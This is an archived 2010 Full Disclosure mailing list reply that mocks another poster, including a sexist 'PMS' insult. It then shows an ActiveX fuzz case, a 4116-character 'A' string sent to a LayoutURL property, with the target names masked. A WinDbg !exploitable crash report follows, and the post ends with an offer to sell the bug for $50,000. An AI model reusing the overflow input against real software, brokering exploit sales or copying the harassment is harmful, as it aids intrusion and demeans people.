Full Disclosure mailing list archives
Re: Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
From: musnt live <musntlive () gmail com>
Date: Thu, 10 Jun 2010 12:39:20 -0400
On Thu, Jun 10, 2010 at 12:18 PM, Susan Bradley <sbradcpa () pacbell net> wrote:

> Nope Mr. Live, other than dealing with .NET updates and a 982331 that keeps wanting to have UAC turned off on some Win7/Vistas to get installed, this is just my normal calm, try to also consider the consumers and patchers viewpoint person today.
>
> musnt live wrote:
>> On Thu, Jun 10, 2010 at 11:36 AM, Susan Bradley <sbradcpa () pacbell net> wrote:
>>> I'm not an enterprise customer, but I am a mouthy female.
>>
>> Hello Full Disclosure, I'd like to warn you about PMS!
Hello Full Disclosure, please forgive for me my premature mail. What is I meant to now say is, I would like to warn you about Denial:

http://en.wikipedia.org/wiki/Denial

Denial is a defense mechanism postulated by Sigmund Freud, in which a person is faced with a fact that is too uncomfortable to accept and rejects it instead, insisting that it is not true despite what may be overwhelming evidence.

I once had denial from vulnerable company I will release in the future:

targetFile = "C:\NOFREEBUGNAMES.ocx"
prototype = "Invoke_Unknown LayoutURL As String"
memberName = "LayoutURL"
progid = "no.free.bugs"
argCount = 1
arg1=String(4116, "A")
target.LayoutURL = arg1

0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0xffffffffdeadbabe
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:XXXXXXXX call dword ptr [ecx]

Exception Hash (Major/Minor): 0x237f6e51.0x456c465d

Stack Trace:
nomore!CBaseBSCB::KickOffDownload+0x82
nomore!URLOpenStreamW+0x41
nomore!URLOpenStreamA+0x94
freebugs!DllUnregisterServer+0x5974
freebugs!BufferComparator::operator=+0x497a
freebugs!msgi_lookup+0x46e61
freebugs!msgi_lookup+0x4f705
vbscript!IDispatchInvoke2+0xb2
vbscript!IDispatchInvoke+0x59
vbscript!InvokeDispatch+0x13c
vbscript!InvokeByName+0x43
vbscript!CScriptRuntime::RunNoEH+0x1158
vbscript!CScriptRuntime::Run+0x64
vbscript!CScriptEntryPoint::Call+0x51
vbscript!CSession::Execute+0xc8
vbscript!COleScript::ExecutePendingScripts+0x146
vbscript!COleScript::SetScriptState+0x14d
scrobj!ScriptEngine::Activate+0x1a
scrobj!ComScriptlet::Inner::StartEngines+0x6e
scrobj!ComScriptlet::Inner::Init+0x156
scrobj!ComScriptlet::New+0x3f
scrobj!ComScriptletConstructor::CreateScriptletFromNode+0x26
scrobj!ComScriptletConstructor::Create+0x4c
wscript!CHost::RunXMLScript+0x277
wscript!CHost::Execute+0x1cb
wscript!CHost::Main+0x38b
wscript!StringCchPrintfA+0xc3f
wscript!WinMain+0x18b
wscript!WinMainCRTStartup+0x5d
kernel32!BaseThreadInitThunk+0xe
ntdll!__RtlUserThreadStart+0x70
ntdll!_RtlUserThreadStart+0x1b
Instruction Address: 0x00000000XXXXXXXX

Description: Read Access Violation on Control Flow
Short Description: ReadAVonControlFlow
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation on Control Flow starting at nomore!CBaseBSCB::KickOffDownload+0x0000000000000082 (Hash=0x237f6e51.0x456c465d)

This bug too exploitable is as is my engrish. Starting bid affects all Windows versions and server remotely. Starting bid $50,000.00
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/